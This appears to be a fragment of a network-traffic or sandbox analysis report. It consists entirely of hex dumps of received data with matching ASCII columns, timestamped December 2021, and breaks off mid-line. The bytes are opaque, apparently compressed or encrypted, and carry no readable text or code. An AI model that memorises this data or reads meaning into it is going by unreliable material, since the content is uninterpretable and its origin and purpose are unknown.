                                                                                                  2021-12-14 15:13:05 UTC111INData Raw: 47 61 3a 0a af 5c 43 cf 40 a9 a3 8b c9 23 c9 20 41 8f 74 0e a5 7b 0c 69 2e 60 67 c2 fe f5 25 20 c0 58 41 37 ce 55 ce 63 be fb b7 9f ba bc 35 7a 09 c1 d5 54 20 66 70 9e c2 53 3f c2 df 6b 89 4d 18 c3 fb 1e 37 7d 87 cc 37 94 32 b6 fa 4f 0c 14 38 5f 1c 7a 42 36 70 f1 29 af 83 9f a1 f1 c0 41 b8 f2 33 31 ad 64 97 d6 8d 56 ef 23 fa 9f 3f 80 e5 de 1a 83 57 9a 95 59 39 5f f8 9a f3 f2 5b 53 90 80 90 24 cf 98 4a 60 09 a2 7a 9d 25 70 72 10 88 27 6c 70 85 ca a2 da 7c 41 51 34 3a 6d ab a8 1f ff 80 4f ec 59 1b 9d 48 84 cf 3f 25 d6 db d5 43 f2 c8 95 7c e9 cc 28 66 79 a7 15 87 be 59 ef 1f 5e de 65 4f 5b e8 9a 3e d3 c4 e5 af ce 76 33 eb 20 54 d0 97 d5 79 45 e5 ee 0f 0e 00 33 94 e8 8e 81 68 fa 6c dc 3e 83 b2 00 73 42 4d dc 94 ce 7f 6e 38 aa f8 82 c6 73 80 f2 3b 0a 51 c1 a8
                                                                                                  Data Ascii: Ga:\C@# At{i.`g% XA7Uc5zT fpS?kM7}72O8_zB6p)A31dV#?WY9_[S$J`z%pr'lp|AQ4:mOYH?%C|(fyY^eO[>v3 TyE3hl>sBMn8s;Q
                                                                                                  2021-12-14 15:13:05 UTC112INData Raw: 74 38 e3 c2 2c 8e 25 7c 7c 9d 27 e6 1f 61 95 7b 57 1e d7 ec 0f f1 a6 d5 36 6d c3 98 87 06 5e 8a 81 ed 8f d7 9d 59 b1 7e e3 f2 9a e8 5c 44 a5 10 ac a5 e7 f4 24 d3 71 e4 39 0d f5 98 bf 5f c4 9d 84 9f 9f 6b 0b 00 63 9d a4 1e 3a d8 09 22 af 9c b6 19 3a eb 3b c8 e3 d3 40 a8 e1 a1 20 0b 8d da bc f3 96 69 d6 82 de 52 39 90 be 35 c2 e2 17 a8 39 6a da bc f8 2c 8a df 84 7e 46 86 25 12 61 57 3e a0 fd 5d fa a0 d0 92 41 4f 26 7b 2f 05 e3 91 06 e1 7a 35 72 38 e4 3c 4f cf bd 35 b4 4d fa 48 2a b4 b3 ca 01 25 16 bd 6c 25 50 cb 8a 84 41 2c 42 f5 27 eb b2 3f e2 e3 e9 8a aa 65 cf 05 b7 18 a6 fd b3 55 47 ac f6 51 73 ca 93 43 a5 ad 1c 24 c2 ae d2 61 15 8e 23 3a df 75 e2 99 3b 39 09 bc 30 47 08 0c 5a 08 70 8e ea bd bf 7f a8 ea 62 c9 c9 e7 a0 48 a6 02 b7 09 ba 76 19 ff e2 77 41
                                                                                                  Data Ascii: t8,%||'a{W6m^Y~\D$q9_kc:":;@ iR959j,~F%aW>]AO&{/z5r8<O5MH*%l%PA,B'?eUGQsC$a#:u;90GZpbHvwA
                                                                                                  2021-12-14 15:13:05 UTC113INData Raw: 2c ea 8c 7c ed e6 02 7c d9 19 ef 15 92 79 02 4d ae b1 ba af fb 7c 38 c3 0a 95 a0 d8 9d b6 c2 ab fb 83 ca b1 0f 85 0e ad 5e 43 2d 41 a9 af ef 0a 27 a6 4c 5e 97 6d 28 68 b4 0b 67 3d b2 61 ff f1 92 fc 97 d3 56 82 26 d7 80 db 57 9d d7 49 9e 9c a9 26 41 08 d8 c6 59 2a 5f 43 81 ed a7 e0 ee d4 42 07 fa 10 c7 2d c4 26 79 80 fc 1b c8 32 ab f1 50 20 ea 39 73 0d 7d 4a ad 71 e4 35 be 84 f1 68 c3 c3 4b 0b df 20 3a 43 75 9c d8 8f ae eb 0f f0 fd 83 98 8a 2d 17 8b 3e 39 bc 4a 38 52 97 02 ec fd af 59 b5 ff e2 21 cc 9b 4e b0 b3 95 90 9a 4a 12 6d 00 91 58 2e 61 8e d4 a8 20 7a 13 cb 0c 09 98 3b 4e 01 e5 99 68 c0 59 14 aa 6d 7f ce 15 43 2e 66 d4 49 da 6f b6 6f e8 e0 2b 7c 62 9e e3 83 92 4c 83 d6 4b 08 fe 37 94 ff 4c b9 f3 d5 e1 c1 03 6b 21 f2 2c 7c 25 9f ca 6b c5 77 c2 06 3c
                                                                                                  Data Ascii: ,||yM|8^C-A'L^m(hg=aV&WI&AY*_CB-&y2P 9s}Jq5hK :Cu->9J8RY!NJmX.a z;NhYmC.fIoo+|bLK7Lk!,|%kw<
                                                                                                  2021-12-14 15:13:05 UTC114INData Raw: 27 12 51 4c 4f 89 04 f1 6e 82 24 7d 46 01 a9 25 a9 91 79 f1 79 71 28 fc 22 1c bb df b2 06 f2 6c e3 ab cf f6 89 4d 8e 2b 8a 2f b6 61 c5 c3 6e d4 7f c3 51 00 ee 40 06 e8 f9 61 2e 2b 2b 14 76 1e 25 46 22 d8 67 fb f2 17 39 f8 01 d3 45 64 9d c4 4a 21 f4 6c fa 01 b8 85 95 17 10 8d 01 0b 6e db 4a 3f c3 97 66 86 9b 4c 5e 5d b9 1b b3 ef 87 c1 d0 dc cf 85 58 0c 4b 6c ec 30 ab fb 77 25 a9 12 f0 e3 be b8 33 33 7f 7e dc 9f 8f 46 06 4e 4b b5 09 38 ee 95 89 ec db 18 64 98 69 59 30 ac a6 cf f4 52 df 46 a8 e4 71 2c a7 f6 85 ab c1 e5 98 c1 87 e7 93 7f 22 df 87 08 a5 39 d6 db 40 af 7f 8d c7 66 b5 4d 41 9e 75 3a 96 a4 2c 74 3e 4f ee 64 ef 40 61 29 cd 48 8e 3b c4 9a d0 59 b5 32 b6 b3 bb ac 39 45 da 55 c6 56 35 6a 5b 95 c2 48 ea dd ed bf 88 61 3f d6 ec c8 32 12 63 cd 08 c5 35
                                                                                                  Data Ascii: 'QLOn$}F%yyq("lM+/anQ@a.++v%F"g9EdJ!lnJ?fL^]XKl0w%33~FNK8diY0RFq,"9@fMAu:,t>Od@a)H;Y29EUV5j[Ha?2c5
                                                                                                  2021-12-14 15:13:05 UTC115INData Raw: d6 9f 81 c6 0c 5c f5 31 d4 44 e4 80 b6 86 39 aa 0b db c8 ab 08 a4 8c 22 4e f3 68 9a e6 44 6c 26 2c 78 3f 69 5e 23 98 51 05 fb 9d b7 ee 43 77 92 9d e8 28 11 ec 9f 1b b4 69 b3 b2 c4 d5 d9 7b 5e 21 74 c5 58 54 c0 be 25 6b 32 de 20 cc 9c b6 a1 ad 01 83 ed 93 73 89 26 61 b4 4b 91 76 8f 43 a5 cb 8f fe 60 cc 23 81 a5 8b ba f4 68 10 53 30 ce 31 d9 0c 37 37 50 40 bf 79 d0 2a f3 23 ce a6 eb 62 cd 04 56 3f 36 5f 75 6d ca d9 16 e7 ae 38 3a 66 29 a4 72 e0 e2 73 49 fb f3 ff 10 2f 49 6d e9 eb 3e 98 89 27 86 48 55 5f e0 91 67 f3 6d 1a d4 7f 43 2e fa 52 15 f5 ce 36 97 f6 6f 6b 89 3f 09 1b 7f 5e a7 59 74 95 c1 08 e4 a1 6c 1c 2b c2 92 5f 1b 51 f6 4e ef 9e d8 90 bd a6 3d 1d f5 8c d0 6b 50 a4 10 ba 9e b5 f6 35 d0 44 34 3a 21 e4 f5 bc 1a c5 97 8b 9f e2 42 c0 02 67 9f a8 07 04
                                                                                                  Data Ascii: \1D9"NhDl&,x?i^#QCw(i{^!tXT%k2 s&aKvC`#hS0177P@y*#bV?6_um8:f)rsI/Im>'HU_gmC.R6ok?^Ytl+_QN=kP5D4:!Bg
                                                                                                  2021-12-14 15:13:05 UTC117INData Raw: 71 a0 16 9c 05 a8 73 05 f8 f1 01 61 ec 39 d7 ea 40 66 5c dc 9f b2 4d d4 7d 5a 4d 07 da 01 fe b4 3c 99 b8 2e 43 4f 47 5e 95 10 f9 8c 7d 09 5b 5b 14 b8 eb d5 6c 67 e9 6c 63 35 fe 24 03 b8 2a af d4 d1 51 ed be 5c 4f 8b 47 93 32 51 3d a7 6a c0 15 7b f8 6f ce 16 ce ee 40 0a 8a ab 1d d0 cf de 14 6c 1e 23 46 22 de 66 1b 0d 3a 1c d1 fc 42 46 9a 82 cb 48 2a 9b af f5 1b 4c 9b a6 27 19 f6 54 01 71 ed 9c 39 ed 86 63 99 8a ee d7 4b a8 1e 99 82 cf c0 da c7 72 21 49 24 6f 66 fb c4 b1 c4 79 3d ab 14 ef e1 4b a6 05 c0 6f 5a c7 1e bc 34 b9 bb 48 55 e2 34 f8 86 93 e1 d5 05 85 db bb 74 0d 81 bb f0 a3 57 b0 bc be 69 70 2b c8 0b 97 a7 d6 86 5e d2 81 f5 1e 8d 5c 0e 85 02 0d 47 20 ce 54 be bf a8 70 25 a6 4c 5e 98 6d 2e 68 b4 0d 64 d6 4d 4c d9 f0 ee 60 20 c0 49 97 2d d7 86 db 57
                                                                                                  Data Ascii: qsa9@f\M}ZM<.COG^}[[lglc5$*Q\OG2Q=j{o@l#F"f:BFH*L'Tq9cKr!I$ofy=KoZ4HU4tWip+^\G Tp%L^m.hdML` I-W
                                                                                                  2021-12-14 15:13:05 UTC118INData Raw: cb 27 7c 34 87 e5 7d 3b 5b ee 0f 04 c7 4b 94 f9 92 81 52 e7 03 bd 29 7d b9 01 ee 84 4a cd 95 f4 86 7e 12 c7 b8 89 c6 7e 44 0b 30 f8 46 cf 82 9f 4d 2c d1 40 d0 ca b8 1a f4 8f 22 40 db 48 f8 b8 c8 47 22 2e 6f c2 62 5e 23 98 79 18 95 e5 b3 ee e0 75 e9 d5 12 28 15 f9 e6 d3 b3 42 fa b0 d0 ad 89 84 5f 09 73 df 76 33 99 ba 25 7e 35 c4 a5 85 b1 b8 a7 ad f1 82 ed 93 07 f7 30 4f 91 52 82 73 af 12 fb f4 e0 ff 4c c5 8c ef e3 8a ab f5 7c ec 29 5f cc 26 ce 1e ed 31 83 d7 6a 78 fc 29 a5 64 e4 1d ed 27 04 04 56 26 6a 79 75 11 cb d9 16 10 ae 78 70 53 3a a1 4a 86 e3 73 b9 c4 bb d2 99 d1 48 4b 50 ff ff cf b5 f1 0b 62 5e 49 e6 13 c9 f7 b2 09 c1 77 71 f2 f9 77 08 3b db 43 6b f3 6f 70 80 26 fe 12 73 4f a7 5b 0f fb 22 0a e0 a8 92 82 6f c3 98 c7 0d 4f 33 46 e6 9e d9 ba 9a a0 3b
                                                                                                  Data Ascii: '|4};[KR)}J~~D0FM,@"@HG".ob^#yu(B_sv3%~50ORsL|)_&1jx)d'V&jyuxpS:JsHKPb^Iwqw;Ckop&sO["oO3F;
                                                                                                  2021-12-14 15:13:05 UTC119INData Raw: fd bf d5 69 2e 95 31 29 d1 65 97 98 3b 33 6b 36 33 3c 39 1e 53 1d 16 6d c9 b8 b5 a3 df b5 74 13 d8 1c 2a 49 ac df 8c 12 b3 60 20 bf e1 0c 7c 03 31 ed c1 7a 70 51 da e1 35 53 c1 85 34 f9 0d cb 03 ea 0c 57 95 a7 32 41 4b 51 67 bb 0a ee 74 13 af 50 4a 16 c0 a5 c6 68 72 fa 6e 6a 3d 80 de 1d aa d2 a3 e9 f4 54 c3 46 c2 67 9c 50 1e 3f 81 2f a6 79 c5 2c 71 ee 47 e0 3b fa e9 e2 11 e0 ad 09 c4 fc 77 0b 7f 07 3f 41 27 fb 96 e1 0c 10 02 64 01 bc b9 64 8e dd 4a 38 8d 96 dd 04 b2 9c 28 15 04 99 04 14 59 4a b4 3e e5 ae 58 8d 83 90 7e f3 a8 1f 91 c0 4b c0 da c3 f5 82 7b ce 59 67 fd d9 27 d0 74 3d bb 0a d0 e3 95 b1 3f 41 41 52 d0 8f 27 4f 66 50 a3 5e de 84 f5 86 88 f8 e2 d1 78 da 91 4f 91 8d af d8 23 46 91 ab 88 f2 61 a7 f7 0a 84 aa 65 9b 69 d7 93 f9 ac 06 4d 0e 8f 1c 87
                                                                                                  Data Ascii: i.1)e;3k63<9Smt*I` |1zpQ5S4W2AKQgtPJhrnj=TFgP?/y,qG;w?A'ddJ8(YJ>X~K{Yg't=?AAR'OfP^xO#FaeiM
                                                                                                  2021-12-14 15:13:05 UTC120INData Raw: 32 ce c2 d5 cb 54 8d 6a 7f f1 1e 60 55 28 1d 82 b4 79 91 fb 4a 4e 43 2b 5f ca 8c ae f0 c4 e1 c0 05 67 22 f0 03 6b a4 b8 f7 6e 19 61 74 27 15 6f 4b 9e 38 96 8a 79 e7 2b ae 3e 83 b2 05 d8 9d 41 c7 e6 f0 78 7f 25 45 e3 83 c6 7d 22 b9 30 d4 40 ee 5d 42 ac 2e aa 2e f9 fd bc 75 ea 9e 30 5e fb 56 df a0 45 66 ff cc 6c 42 2e 5d 0b ba 56 06 80 fd 92 ee 47 7f c1 e4 e9 28 1f d1 39 c2 b6 69 af 3d ea a8 90 7b 4d 3e 74 e3 7a 2c 8a b9 0d 4b 30 dc 51 f7 6e b7 a5 c4 2b 96 fc 8d 70 5b 27 61 b2 24 77 74 af 09 ed c6 26 f0 61 c6 94 ee c3 a2 5d f2 6a 18 a4 59 cf 31 c6 08 f1 31 9a d9 bc 5e d4 2b 88 70 42 a1 ef 48 cc 10 42 38 2e f9 75 11 c1 f1 31 15 ae 3e 3d 58 d2 a3 4a 8c f2 6f 5d d3 c5 fe 08 d7 5e cc e0 e8 29 43 8a e5 1f 4b f6 5f e1 97 56 c8 6d 1a c3 6c 72 38 f9 7e 1a cb 2a 2e
                                                                                                  Data Ascii: 2Tj`U(yJNC+_g"knat'oK8y+>Ax%E}"0@]B..u0^VEflB.]VG(9i={M>tz,K0Qn+p['a$wt&a]jY11^+pBHB8.u1>=XJo]^)CK_Vmlr8~*.
                                                                                                  2021-12-14 15:13:05 UTC122INData Raw: e1 e4 d0 43 ff 3e c0 a6 36 ad 04 ff 8a bd 5a c3 fa b6 3e 87 d4 22 55 41 8e d4 49 60 db fc 2a b2 b2 33 f2 f6 80 de 7a 16 8a 5b 03 d5 4d b5 87 1d 2a 0f bb 23 2b 20 11 a4 0d 33 51 f9 ac cb e9 b1 32 71 02 cd 19 31 5f a6 04 a5 16 ac 7d 1b ef e0 1d 61 0e c6 fa c5 5e 77 42 c9 93 ac 45 c1 92 4c 7e 15 35 08 ca 2e 19 ad c6 3a 50 42 58 56 8b 18 ee 63 6b 3a 5e b4 11 83 32 d7 6f 69 f9 10 eb 34 ef 23 0f a3 cb be eb e4 40 fa bf d9 43 64 46 bf 24 90 3f b6 61 f3 11 6a f8 69 ec 10 f8 ef 46 28 15 bb 1d da bb f2 09 7f 0b 31 63 20 c4 78 f4 1b 09 1b 17 07 90 a9 4d b6 c7 5b 21 e8 3a f9 01 b8 89 8d 1b 14 9e 07 00 60 fe ab 1f 11 87 49 84 f0 b8 54 4b ae 0c 8b e6 a4 d2 cd c3 ed 81 4c 24 a4 66 d7 c4 bb dd 65 2b 8b 14 ef db a6 b0 29 dc 69 4d c3 70 84 72 58 55 be 5b fc 48 19 84 82 e6
                                                                                                  Data Ascii: C>6Z>"UAI`*3z[M*#+ 3Q2q1_}a^wBEL~5.:PBXVck:^2oi4#@CdF$?ajiF(1c xM[!:`ITKL$fe+)iMprXU[H
                                                                                                  2021-12-14 15:13:05 UTC123INData Raw: 27 9a 4a 10 63 03 aa 4f 2c 70 83 d8 bd cf 7c 36 ea 52 3b 67 ce de e9 fe 8a 65 d3 45 0e b8 20 7d ce 39 4c 00 b6 04 4b da 7a fa 80 e2 e0 3c 60 12 5e 1f 82 b4 30 7c de 5c d8 78 4f 9f ea 9a 3e b7 2b e0 c0 09 67 3c f0 2a 13 c8 95 d5 79 2d 19 3f 0d 04 65 24 68 e9 84 8c 61 93 d2 b8 3e 89 d7 d3 ed 9c 47 de 9c f3 76 01 72 c4 af 86 d7 76 74 e9 33 d4 42 f7 8b c7 8c 2c aa 0d c2 da ad 65 e8 e2 0a 48 f1 78 f6 b0 54 60 0a 02 6b 42 28 77 0d 9e 53 00 ae 3e b4 ee 4d 1a cd d7 e9 2e 04 f8 e1 cb 9e 45 bc b0 c7 80 be 78 5e 23 5e 20 5e 29 80 d0 03 6d 30 da 4a 94 9e d9 8f c0 38 84 eb 88 0f c5 3e 60 b4 41 4f 79 8a 2b c9 e3 1e f4 73 d2 bc c4 e6 8a b0 2e 6a 03 22 64 19 22 d7 0a e7 31 91 f3 e1 87 2f d4 9f 73 d8 70 fc 5d dc 11 47 3a 88 ed 4a fa 36 26 e9 16 84 38 6a 44 3a a1 4a 86 e3
                                                                                                  Data Ascii: 'JcO,p|6R;geE }9LKz<`^0|\xO>+g<*y-?e$ha>Gvrvt3B,eHxT`kB(wS>M.Ex^#^ ^)m0J8>`AOy+s.j"d"1/sp]G:J6&8jD:J
                                                                                                  2021-12-14 15:13:05 UTC124INData Raw: 0e 6f 07 14 ec b9 34 ed 73 17 14 2f e4 3a 3b 28 b7 35 be 15 e4 41 02 bc bd cd 0d d3 22 98 44 18 5d c9 86 e6 9f 24 6a c7 38 d3 a2 f7 8d 11 c2 8a ed 51 da 04 b7 12 8e aa b1 55 41 84 c1 52 73 cc e5 3a a5 ad 06 0c f7 ac c8 6b 06 88 6e 2b 29 58 ff 98 3b 3b 1a b8 4f 47 3e 0d 5e 0e 1b 38 94 bc b5 a1 9a 32 66 23 da 31 c7 5d a6 02 be 1b b3 71 0a 06 f5 41 76 12 3a f9 97 6d 75 51 d8 f3 c1 53 c1 87 59 b1 40 cb 09 e4 0c 04 94 a7 32 78 42 46 4f 92 72 93 73 7c 21 52 5e ee ae 2b 38 69 72 f7 53 43 37 ec a7 ab d7 54 af f8 f7 42 e9 d3 46 66 9a 43 bb 60 83 2f ad 17 a4 3c 6f fc 6c d2 3c 81 90 41 00 fa bb 66 50 d5 d4 0f 57 e0 2c 46 39 d7 6c 1b 0d 00 eb e8 0d bb 95 48 9f c6 d5 90 e6 3c f9 01 b6 98 88 7f 99 8c 10 04 59 b1 b6 3e e5 fb e4 8e 83 9e 52 5d aa 64 1a f8 86 c5 d8 b8 7e
                                                                                                  Data Ascii: o4s/:;(5A"D]$j8QUARs:kn+)X;;OG>^82f#1]qAv:muQSY@2xBFOrs|!R^+8irSC7TBFfC`/<ol<AfPW,F9lH<Y>R]d~
                                                                                                  2021-12-14 15:13:05 UTC125INData Raw: e2 88 59 cc 34 ea f4 ac af e7 d4 10 a1 6e 58 0e 58 33 56 9e 93 d6 df 5b 7e 81 f7 ec 37 e7 bf 5b 66 24 d0 31 e5 d3 15 72 14 9b c9 0b 5d 8e ed a8 c1 6e 20 d1 1c 17 65 c4 b7 34 a9 f4 fa c1 48 1b af d5 a4 e2 33 6c 0c c6 fd 53 f2 5d 97 7c e5 ca 6c 09 e4 8e 1d 86 a5 c5 a5 f2 56 f8 74 3f 62 f2 b2 19 da d5 e7 ea 55 0a aa e0 27 78 28 0e f0 52 30 50 f2 10 34 70 47 bc c5 86 8a 7f d6 59 c4 a7 82 b8 29 f1 06 64 e0 99 c4 65 60 02 da a0 aa eb 7b 5c f3 1b 8e 3a 7d 81 b4 aa 30 30 2e fc c1 9a 6b ff c6 3d 47 d9 53 e5 a0 43 46 40 50 f7 43 2e 5b 3c 95 c9 23 ab d9 90 f1 4e 6a b1 ca e5 00 38 ea f0 c6 9c 0b c7 29 c0 a8 94 65 54 bf 53 e6 50 0f 95 b5 3a 0b 2f d7 73 a9 9f b6 a3 e8 66 fc 74 98 1f ae 39 6a 2e 6e bc 7d 89 1c f5 fc 71 e7 48 eb 96 fc e0 a0 d8 8e f3 13 28 77 d0 3d 47 3e
                                                                                                  Data Ascii: Y4nXX3V[~7[f$1r]n e4H3lS]|lVt?bU'x(R0P4pGY)de`{\:}00.k=GSCF@PC.[<#Nj8)eTSP:/sft9j.n}qH(w=G>
                                                                                                  2021-12-14 15:13:05 UTC127INData Raw: 3d f3 89 96 12 df ee 0b 95 38 e0 42 bd fe 3e bd f8 1f 5b 61 85 04 25 42 72 bb a4 92 44 e4 aa f2 86 f4 4e 20 51 69 6a 7f 90 00 e8 6c 29 fa 18 c9 35 06 c9 88 15 31 63 f6 41 1d ad 9e e7 05 0d 34 97 06 51 c4 c8 8c ef 94 1b d8 da 15 dd 8e 36 b8 37 71 88 ac 4d c4 2c 9a 10 8e ac 9b 3f 3f 1d d9 53 77 d3 ca a1 80 80 18 2a e8 9a f2 ca 04 89 34 31 ff 60 b1 98 3d 13 72 c5 ab 3d 3f 09 45 3b 85 60 c5 b3 93 ba 87 12 d6 11 de 31 34 75 8b 00 b6 1c 99 0a 76 61 e1 0c 72 0d 00 61 cc 75 7b 77 c3 b6 9f f4 c3 83 5b 7a 25 e6 0b e6 22 3a fe d9 a1 51 42 43 50 a1 95 cb 5f 72 03 4e 73 30 04 3f c6 68 64 d9 52 6c 35 e9 03 76 d4 4d af f8 f7 5f d1 32 e3 4a 94 61 8c 02 a1 9e a5 6a db 20 47 d5 6d c4 38 d0 85 3e 99 ff b9 19 cf ef 4e 2e 52 03 08 59 08 f3 c0 e7 0c 16 0c c1 2b be b9 63 b7 ac
                                                                                                  Data Ascii: =8B>[a%BrDN Qijl)51cA4Q67qM,??Sw*41`=r=?E;`14uvarau{w[z%":QBCP_rNs0?hdRl5vM_2Jaj Gm8>N.RY+c
                                                                                                  2021-12-14 15:13:05 UTC128INData Raw: 4b e4 9e cc 0c dc 50 20 df 62 03 32 27 3d 3c 0b 21 51 70 fb 3c 87 ae 9c ba c7 e9 2f 6a 6b 32 31 47 7b f4 5d 80 7d e5 05 e3 8f a4 02 e1 d4 16 94 31 0e ba 5b 33 54 ac 67 8d 6b 50 58 9d f0 97 be ea bf 56 40 3d 9e 4b 12 4e 14 72 0f a2 7b 03 72 85 cd 9b b4 05 a6 c3 34 3e 78 a1 2b 3b d2 84 45 df 2d 3f 1c 4b 81 cf 25 62 3b db d5 4f f0 1e eb e5 e2 e0 3e 68 1b 15 38 af b1 79 9f b9 7c 71 6b 20 4e f7 8a 1c f5 d7 e1 c6 25 1e 4d 78 26 7c 30 8b b2 e5 1e 5b e0 29 1b 08 6b 2b ec 84 8a 62 d4 2e b8 3e 85 92 43 92 05 40 cd 96 fd 10 e5 1b e8 a0 a4 d9 11 7c 31 35 d4 44 fb 8f 9c 83 2c aa 0d fb a0 c2 ec e1 8d 26 55 98 e4 c2 8d 4b 4a 3d 47 4e 91 2a 5f 23 87 7b 2b 84 d5 b0 c4 29 0b 70 d4 e9 2c 0a 82 6a e5 9b 66 9f af ab 88 48 7e 5e 25 69 ee 74 04 88 bf 23 45 5e a2 c2 85 9d b2 ba
                                                                                                  Data Ascii: KP b2'=<!Qp</jk21G{]}1[3TgkPXV@=KNr{r4>x+;E-?K%b;O>h8y|qk N%Mx&|0[)k+b.>C@|15D,&UKJ=GN*_#{+)p,jfH~^%it#E^
                                                                                                  2021-12-14 15:13:05 UTC129INData Raw: 58 03 63 93 9e 8a 2c b7 fd b9 8a b7 8f 2a 1b 65 31 e0 b4 f1 1a a9 c9 8f 38 23 a6 b7 c4 f5 bc e5 a5 19 d9 3d f7 b2 31 3f dd ee 97 9a 7b 8c fd 9c 71 3a a2 cb a5 20 4b 8a 22 25 5d 7a 13 a4 92 42 d1 22 a4 32 f7 4e 22 5b 97 14 e6 91 9a c9 5e 0c 46 1d 74 3a 20 d6 9c bf b9 61 f6 5b 2a 8a b4 ca 01 27 b0 c3 f5 2e 5d cd ac 7a 8b 2e 42 65 1d fe b9 0f ad 86 e8 8a ac 6d 54 03 b7 12 94 82 9c 57 41 82 f2 d1 0d 55 fd 3b a1 8d 84 0c f7 ac 48 4e 2b 98 12 09 45 4d b3 98 1b ab 1f bb 32 24 17 20 58 0c 19 6f 6a c3 2c a4 b0 36 55 80 de 31 2d c7 83 2f a7 3c 93 f3 08 f8 e0 2c e2 15 38 fb f4 70 58 53 dc 88 95 d0 bf 1a 5a 61 09 eb 9d e6 24 10 0e 82 15 41 64 67 db 98 0f ee 52 e7 22 51 4a 0e 87 10 c4 68 7e db fd 10 ac ee 29 18 8a 41 ae f8 f3 da ce 85 d7 41 ba d2 93 38 81 0f 04 6d db
                                                                                                  Data Ascii: Xc,*e18#=1?{q: K"%]zB"2N"[^Ft: a[*'.]z.BemTWAU;HN+EM2$ Xoj,6U1-/<,8pXSZa$AdgR"QJh~)AA8m
                                                                                                  2021-12-14 15:13:05 UTC130INData Raw: e7 8a be d0 ce 12 28 73 55 14 f0 09 cb 00 22 cd 94 79 f0 3a 86 66 cf b9 e6 60 e0 06 56 2a 2c dc 0b 88 ca d9 12 30 0b 38 2b 70 a0 84 67 94 c5 53 ec fb e2 fa 28 cb 40 41 e7 f7 26 6a b3 f3 0b 65 7f d9 9f 04 7f e0 6c 3a 63 7a 5a d0 61 5b 3d f1 e5 0c 22 f3 6f 7a ac 08 ff 1a 53 53 ac 73 22 d1 c0 0e ca 24 c4 f8 6c c3 96 7b a3 58 e5 4b 75 aa f0 99 65 87 b6 17 f3 9a ce 46 59 a4 10 b9 9d 98 db 26 d5 5f e0 b9 73 6a f6 c7 5b e4 3f 8f 9d 99 9e e4 2f 72 b1 9e ac 2c b7 fd 03 ed 92 9e 0c 20 c3 1c e2 b4 d7 6a 2c b7 16 23 0b 8f 95 6d f3 96 63 41 a5 f5 2c d5 b2 17 3f dd ee 2d f8 5e 9e db a6 d6 17 a0 cb 83 54 ce f4 bb 3b 71 56 1e 0c 92 44 fb 3a ff 86 e7 68 06 d1 07 14 e6 b1 4b e4 73 1d 7e 15 c9 38 20 d0 96 b7 c0 f8 f7 41 06 87 1d ca 07 0d a8 98 41 3e 7b e9 27 eb 8b 2e 62 ac
                                                                                                  Data Ascii: (sU"y:f`V*,08+pgS(@A&jel:czZa[="ozSSs"$l{XKueFY&_sj[?/r, j,#mcA,?-^T;qVD:hKs~8 AA>{'.b
                                                                                                  2021-12-14 15:13:05 UTC131INData Raw: 52 63 72 8f 14 e9 02 9c 72 65 9d c2 c1 02 b6 ac de 21 79 9a 8a 04 3b ec 1a 00 71 f6 97 16 c2 84 65 89 a9 1c 28 d2 a9 1f 9f d9 4a c1 da c3 66 b3 7e 1e 7c 47 37 ce aa d7 54 b9 b0 19 f0 ed 96 8f 04 cf 7e 54 fa 08 fb c7 47 44 b3 6a 3b 27 f5 86 18 c9 e7 01 5d fa 5a 58 1c 8a 8f 7f 28 55 b0 a5 8b cc 5a 29 c8 0c ae 2d b9 13 49 c3 83 cd 4a a5 4d 0e 1f 2d 82 44 0a fa 8e a9 a9 80 f8 ec ac 46 41 90 5c 0b 45 a7 00 7e 02 ca 1e 4a f9 9a 76 00 0f 52 9d 30 5e ae f6 54 b0 ec 78 9f b0 af 10 b9 06 c4 d5 4d 09 66 65 9c c2 5f cb 44 a7 d8 88 4d 1d ff 2b 1e 35 7d 05 e9 25 d1 14 9a 2a 4f 0c 14 18 51 17 7a 25 4e 55 cc 1e ad 83 98 90 47 bd d8 15 f2 37 11 92 64 97 c7 3f 75 c7 31 da cc 55 82 e5 d4 36 b8 33 26 97 46 15 7a ab 0b f3 f4 7b de e7 76 f2 24 cb b2 8b 66 22 fa f1 be 67 06 54
                                                                                                  Data Ascii: Rcrre!y;qe(Jf~|G7T~TGDj;']ZX(UZ)-IJM-DFA\E~JvR0^TxMfe_DM+5}%*OQz%NUG7d?u1U63&Fz{v$f"gT
                                                                                                  2021-12-14 15:13:05 UTC133INData Raw: 09 6f b2 25 6f 2d f4 76 86 9d b0 8f 40 46 1b ec 99 1b 8a d4 61 b4 4b 0b 53 82 12 d8 c3 ec fe 60 c6 b4 10 eb 8a ba e7 42 3f 2a 73 c9 1b 5f 65 74 21 86 c9 b4 8a d0 2b 8e fc ea 8b fe 6e ed f7 56 2c 06 7a 98 1c cb d9 0b 38 83 3a 2b 76 10 23 34 1f e2 73 4d db 16 fa 08 d1 d2 64 ca f9 0f 62 6a f1 0b 63 75 ab ec 9d 7e fa 40 37 c7 7a 5c fa 79 00 89 e2 c3 28 a4 06 6f 7a 8c bb d2 37 42 6a 85 ae 0f d3 c0 28 18 af ba 61 77 eb bf 59 04 5e cf c9 91 16 dc 8b 47 87 e7 17 f3 9a 74 51 7c b5 36 86 7b b0 f6 24 f5 a5 c7 3b 0d e9 df ea 5d c4 91 a5 1f e7 9d c0 02 67 b7 49 04 2c b7 67 06 82 8b b8 2c cc eb 31 e0 94 d1 4e ae c9 96 0a 26 89 b5 c2 d9 14 1d 42 81 d8 39 d3 6a be 3f dd 74 28 92 47 b8 fb 44 fe 3a a2 eb 86 70 4c 8a 3f 12 5c 50 3e a0 b8 c6 85 39 db ab f2 6e df 7b 07 14 7c
                                                                                                  Data Ascii: o%o-v@FaKS`B?*s_et!+nV,z8:+v#4sMdbjcu~@7z\y(oz7Bj(awY^GtQ|6{$;]gI,g,1N&B9j?t(GD:pL?\P>9n{|
                                                                                                  2021-12-14 15:13:05 UTC134INData Raw: a8 e6 8c 95 47 93 24 a9 02 a5 6a dd 17 e9 86 f6 c5 3e fe cf 59 01 fe b9 87 f5 f9 c6 2d 5f 14 2f 46 33 f3 89 ea 0c 16 0a f9 2e 91 bb 65 9b e8 d9 59 02 bf f8 05 92 80 8b 04 1b 17 35 2d 60 cf 94 24 ee 86 65 af 82 8a 56 4b b6 37 b6 fb 86 c7 f0 45 82 0f 52 0c 5e 47 e0 cf aa d7 ee 18 97 0b d6 d2 ae a6 29 cd 5e 5b c0 8e 85 41 67 6c 9a 48 f6 21 df 00 fc 75 cb 13 7f fa 8b 59 1c 8a 35 fd 0f 47 96 9a b5 e5 77 2b e8 20 94 ab c7 95 41 eb aa ef 84 a3 67 88 fb 91 ae 56 28 fa 5d a8 a9 80 42 00 8b 54 67 af 63 22 68 a5 20 4b 38 4c 60 cc eb b2 5f 22 c0 54 b7 b2 ba 12 da 46 92 ec a9 